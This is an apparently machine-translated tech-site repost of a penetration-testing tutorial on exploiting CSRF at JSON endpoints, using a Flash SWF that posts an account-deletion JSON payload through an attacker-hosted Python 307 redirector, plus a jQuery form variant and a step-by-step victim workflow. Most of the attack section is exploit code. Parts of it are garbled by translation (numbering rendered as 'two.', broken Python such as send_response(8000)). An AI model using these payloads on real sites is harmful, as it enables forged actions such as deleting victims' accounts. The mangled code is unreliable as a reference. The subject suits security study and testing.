Shulou(Shulou.com)05/31 Report--

How to use CSRF loopholes on JSON endpoints, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

(CSRF + Flash + HTTP 307) = stop it, you are "dead"!

If you want to exploit a CSRF vulnerability at the JSON endpoint through a server controlled by a third-party attacker, I recommend a GitHub project called json-flash-csrf-poc [download address].

Background story

During a recent penetration test, we found not only several business logic vulnerabilities, XSS vulnerabilities, and insecure direct object reference vulnerabilities, but also some cross-site request forgery (CSRF) vulnerabilities. Among the vulnerabilities we found was a CSRF vulnerability in the JSON endpoint, which could receive POST body in JSON format. To exploit this vulnerability, we need to send a custom Content-Type header with POST body, but standard JavaScript/HTML does not support this type of request. When using XMLHttpRequest, a custom Header invokes a pre-check request according to the CORS specification. Next in this article, we will show you how to exploit this CSRF vulnerability.

Problems encountered when exploiting CSRF vulnerabilities

CSRF vulnerabilities are very useful for attackers. If a website has a CSRF vulnerability, the vulnerability can automatically take advantage of the browser's capabilities to send authentication tokens regardless of the source of the request, and the server and the application do not distinguish between the source of the request by default.

For example, the following simple PoC exploits the CSRF vulnerability, which invokes the account deletion function through an POST form:

When a logged-in user browses the malicious page (using the same browser and the authentication session is active), the page will trigger the feature with a POST request. Because the browser sends an authentication token by default, this function will be triggered on the server side and the attack will be completed.

Note that the Content-Type header in this request is set to application/x-www-form-urlencoded because the server needs to receive URL-encoded HTML form data.

So why can't we use this PoC to take advantage of the CSRF in the JSON endpoint? The reasons are as follows:

1. POSTbody needs to be sent in JSON format, which can be cumbersome to build with HTML form elements.

2. The Content-Type header needs to be set to application/json. Setting up a custom Header requires the use of XMLHttpRequests, which also sends an OPTIONS pre-check request to the server.

Flash and redirection

AdobeFlash allows Web pages to request users to use ActionScript, while ActionScript can also be used to set up a custom Header for Web requests. Unless there is a valid crossdomain.xml file on the remote site, Flash does not send requests with custom Header to servers from different sources.

To completely avoid the impact of cross-domain files, we use Flash to send a request (with our POST Payload) to the same server where the Flash file is located, and get another file. This file will be used as a redirector and send the HTTP status code 307. The difference between HTTP 307 and other 3XX HTTP status codes is that HTTP 307 ensures that there is no change in the request method and body after the redirect request is sent. HTTP 307 redirects the POST body and HTTP headers to the final URL we specified and completes the attack.

Content integration

To design the final PoC, let's first take a look at the vulnerable JSON endpoints and related requirements:

1. / the request Header that can be accepted by the userdelete endpoint needs to be application/json.

two。 Vulnerable endpoints need to send the following JSON data:

{"acctnum": "100,100", "confirm": "true"} attacker settings

The attacker's server consists of the following components and traffic:

1. When the target user downloads and runs the attacker-hosted Flash file in the browser, the malicious file will send an HTTP POST request to the attacker's server (the redirector).

two。 The redirector script returns a HTTP 307 status code in the response message (Location header).

3. Next, the target user's browser sends another POST request with a HTTP header like the final URL and completes the attack.

Create a csrf.swf file

To create a csrf.swf file that can send Web requests, we need to follow these steps:

1. Install FlexSDK to compile ActionScript into a swf file. Flex needs to install 32-bit JVM, which can be done by installing 32-bit JDK.

two。 Create a text file named csrf.as that contains the following ActionScript code.

3. Get the IP address / domain name of the host system (the attacker's server) hosting the Flash file and replace the one in the code.

4. Run the "mxmlc csrf.as" command to compile the file to csrf.swf.

Package {import flash.display.Sprite; import flash.net.URLLoader; import flash.net.URLRequest; import flash.net.URLRequestHeader; import flash.net.URLRequestMethod;public class csrf extends Sprite {public function csrf () {super (); var member1:Object = null; var myJson:String = null; member1 = new Object (); member1 = {"acctnum": "100", "confirm": "true"} Var myData:Object = member1; myJson = JSON.stringify (myData); myJson = JSON.stringify (myData); var url:String = "http://attacker-ip:8000/"; var request:URLRequest = newURLRequest (url); request.requestHeaders.push (newURLRequestHeader (" Content- Type "," application/json ")); request.data = myJson; request.method = URLRequestMethod.POST; var urlLoader:URLLoader = newURLLoader () Try {urlLoader.load (request); return;} catch (e:Error) {trace (e); return;}

Create a Web server

The basic function of the server is to host csrf.swf files and send 307 redirects when other HTTP traffic is received, which can be achieved using Python's BaseHTTPServer module.

1. Create a Python file named pyserver.py that contains the following code.

two。 This Python code is the Web server where we host csrf.swf, which sends HTTP 307 redirects to http://victim-site/userdelete endpoints.

3. Run the Web server with the command "python pyserver.py".

Import BaseHTTPServerimport timeimport sys HOST= 'PORT= 8000 classRedirectHandler (BaseHTTPServer.BaseHTTPRequestHandler): def do_POST (s): if s.path =' / csrf.swf': s.send_response (8000) s.send_header ("Content-Type", "application/x-shockwave-flash") s.end_headers () s.wfile.write (open ("csrf.swf") "rb". Read () return s.send_response (307) s.send_header ("Location", "http://victim-site/userdelete") s.end_headers () def do_GET (s): print (s.path) s.do_POST () if__name__ ='_ main__': server_class = BaseHTTPServer.HTTPServer httpd = server_class ((HOST,PORT), RedirectHandler) print time.asctime ()) "Server Starts -% s% s" (HOST,PORT) try: httpd.serve_forever () except KeyboardInterrupt: pass httpd.server_close () print time.asctime (), "Server Stops -% s% s"% (HOST,PORT)

Note: when we create this HTTP redirect server, we refer to the code of this [GitHub library].

PoC workflow

The following is the entire process of the attack, in which the target user's browser must be Flash enabled:

1. The user logs in to http://victim-site/ in the browser.

two。 The user is redirected to http://attacker-ip:8000/csrf.swf.

3. The Flash file is loaded successfully, and a POST Payload with custom Header is sent to http://attacker-ip:8000/.

4. The attacker's server sends HTTP 307 redirects, which allows the POST response body and custom HTTP headers to be sent to http://victim-site/ as is.

5. The target user refreshes his http://victim-site/ page and finds that his account has been deleted.

Other ideas.

Here we have to use a Flash file and a 307 redirector because the server verifies that the requested Content-Type is application/json. If the server does not perform this detection, we can use JavaScript to create a HTTP element attribute and generate and send the POST request with the following code:

$(document) .ready (function () {$("# json"). Attr ("name",'{"acctnum": "100", "confirm": "true", "a": "'); $(" # myform "). Submit ();})

Of course, you can also use Fetch_API to send JSON POST requests and complete the attack.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.